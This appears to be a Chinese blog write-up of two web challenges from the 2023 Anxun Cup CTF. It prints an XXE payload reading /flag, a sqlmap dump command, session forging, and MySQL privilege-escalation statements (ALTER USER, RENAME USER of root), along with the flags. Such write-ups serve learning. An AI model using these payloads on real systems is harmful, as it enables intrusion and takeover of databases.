首页 > 其他分享 >2023安洵杯web两道WP

2023安洵杯web两道WP

时间:2023-06-11 19:34:23浏览次数:38  
标签:web 安洵 修改 secret user WP 权限 root payload

Web

CarelessPy

在首页提示存在eval和login的路由,在download存在任意文件下载
访问eval可以读取目录下的文件,知道/app/pycache/part.cpython-311.pyc路径,然后使用download下载下来,进行反编译

使用在线工具进行反编译,得到session的key

然后对session进行伪造

登录成功

一看就是XML注入

<?xml version="1.0" ?>
<!DOCTYPE message [
<!ENTITY shell SYSTEM "file:///flag">
]>
<result><ctf>杂鱼~</ctf><web>
&shell;
</web></result>
#SYCTF{COrReCt_AN5w3r_fa0efe410508}

Confronting robot

打开网页发现存在sql注入

直接sqlmap跑
payload:sqlmap -u "http://x.x.x.x:34918/?myname=aaa" -D robot_data -T name --columns --dump

得到路由/sEcR@[email protected]
在该页面可以通过POST传入code直接执行Sql语句

使用sqlmap跑mysql.user的数据表查看一下权限,发现当前用户拥有Super_priv的权限,但是没有其他可以利用权限。但是root用户存在所有权限

解题思路:修改'root'@'::1'为'secret'@'%',然后把'secret'@'localhost'随便修改一个名字,这样链接的数据库就拥有root权限了。需要注意的是密码也需要改成和secret相同。
把secret密码dump下来

首先修改root的密码,
payload:alter user 'root'@'127.0.0.1' identified by PASSWORD '*C4809B442CD41D91C25BAEA070D00FF39A87190D';

查询是否修改成功

在继续把'root'@'127.0.0.1'修改成'secret'@'%'
payload:rename user 'root'@'127.0.0.1' to 'secret'@'%';

然后把'secret'@'localhost'修改成任意名字即可
payload:rename user 'secret'@'localhost' to 'aaa'@'%';

最后直接读取game.php文件,获得flag

SYCTF{RObOt_r0B07_3599ec7eac28}

标签:web,安洵,修改,secret,user,WP,权限,root,payload
From: https://www.cnblogs.com/Aann/p/17473430.html

相关文章

  • Nginx+Jwplayer播放流媒体视频
    Nginx+Jwplayer播放流媒体视频JWPlayerisoneofthemostpopularvideoplayersontheInternet.Itisusedbymostmodern“tube”websitesforvideohosting,publishingandadvertising.ItcanbeusedasstandaloneinyourHTMLandFlashcode,orintegratedin......
  • 软件测试|web自动化测试神器playwright教程(十五)
    前言我们在日常工作中,会经常遇到弹出警告框的问题,弹框无法绕过,必须处理才可以执行后续的测试,所以弹框处理也是我们必须掌握的一个知识。弹框通常分为3种,分别为alert,confirm,promot。alert弹框:只有信息和确定按键confirm弹框:在alert弹窗基础上增加了取消按钮prompt弹框:在confirm的基......
  • 软件测试|web自动化测试神器playwright教程(十六)
    前言在我们的日常工作中,经常会遇到文件下载的事件,如下图:我们可以看到在下载文件时会弹出一个Windows对话框,我们知道,selenium只能操作web页面,无法操作Windows对话框,使用selenium时,我们可以借助autoit等工具实现该功能。playwright则可以不借助其他工具实现文件的下载。文件下载playw......
  • WPF 入门笔记 - 03 - 样式基础
    ......
  • web服务器一键安装脚本 EZHTTP
    EZHTTP是集成了nginx apache php mysql memcached等web服务器软件的一键安装脚本,它能自由选择安装任意的软件,自动选最优线路下载,定制容易。如何安装因为安装时间会比较久,建议安装前使用screen,screen使用方法如下:1、首先得安装screen,ubuntu使用apt-getinstallscreen,centos或r......
  • Burp Suite Professional / Community 2023.6 (macOS, Linux, Windows) - Web 应用安
    BurpSuiteProfessional/Community2023.6(macOS,Linux,Windows)-Web应用安全、测试和扫描BurpSuiteProfessional,Test,find,andexploitvulnerabilities.请访问原文链接:https://sysin.org/blog/burp-suite-pro-2023/,查看最新版。原创作品,转载请保留出处。作者......
  • WEB漏洞—文件上传之黑白名单绕过
    文件上传常见验证---后缀名,类型,文件头等1. 后缀名:黑名单,白名单后缀名是直接的验证,分为黑名单(asp,php,jsp,aspx,cgi,war…)和白名单(jpg,png,zip,rar,gif…)。黑名单是不允许那些格式的文件上传,缺陷:添加文件的后缀,如PHP5等;白名单是只允许那些格式的文件上传,其余文件则不允许上传......
  • 采用软件负载均衡器实现web服务器集群(
    我用nginx实现网站负载均衡测试的例子,windows下IIS做负载实测.  如果你的网站访问量(pv)越来越高,一台服务器已经没有办法承受流量压力,那就增多几台WEB服务器来做负载吧。做网站负载可以买硬件设备来实现,我们公司用的是F5,不过价格就几十万到上百万,太贵了,目前好多门户网站与大访......
  • WPF控件库之Syncfusion
    参考文章:https://www.cnblogs.com/zh7791/p/14009262.htmlhttps://www.cnblogs.com/DotNeter-Hpf/p/16523758.htmlhttps://www.cnblogs.com/redmoon/p/4420942.htmlSyncfusion介绍Syncfusion提供了一个由兼容的开发人员控制套件,可嵌入的BI平台和业务软件组成的生态系统。它......
  • SYCTF2023 WEB writeup
    CarelessPy一进来就是个任意文件下载功能,不过做了些限制,这题从头到尾都在骂杂鱼。。。(虽然我确实是(bushi)查看页面源代码,给了个/eval/login两个路由,/eval是个目录遍历,/login尝试登录无果,有session,应该需要伪造session,利用/eval查看app下的pyc文件,然后down下载在线找个pyc......